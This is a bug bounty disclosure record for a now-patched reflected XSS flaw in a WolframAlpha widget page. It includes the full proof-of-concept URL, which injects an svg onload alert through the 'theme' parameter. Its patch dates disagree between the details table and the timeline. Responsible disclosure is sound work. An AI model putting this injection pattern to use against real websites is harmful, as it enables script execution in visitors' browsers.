wolframalpha.com XSS vulnerability

2017-09-22T12:03:00
ID OBB:305978
Type openbugbounty
Reporter eb
Modified 2017-12-22T06:38:00

Description

Vulnerable URL:
http://www.wolframalpha.com/widget/widgetPopup.jsp?p=v&id=ae7a1abc672c5913a8338992ec6b7e72&title=Combine%20Like%20Terms%20Calculator&theme=blue1%22--%3E%3C/script%3E%3Csvg/onload=%27;alert%28/OPENBUGBOUNTY/%29;%27%3E&i0=2x^2%20%2B%2013%20%2B%20x^2%20%2B%206&podSelect=&includepodid=Input&includepodid=Result&podstate=Result__Step-by-step%20solution&showAssumptions=1&showWarnings=1

Details:

Description| Value
---|---
Patched:| Yes, at 25.09.2017
Latest check for patch:| 25.09.2017 15:43 GMT
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 2609
VIP website status:| Yes

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 22 September, 2017 12:03 GMT
Generic security notifications sent to website owner| 22 September, 2017 12:53 GMT
Notification sent to subscribers (without technical details)| 22 September, 2017 14:17 GMT
Vulnerability details disclosed by researcher| 21 December, 2017 13:20 GMT
Vulnerability patched by the website owner| 22 December, 2017 06:38 GMT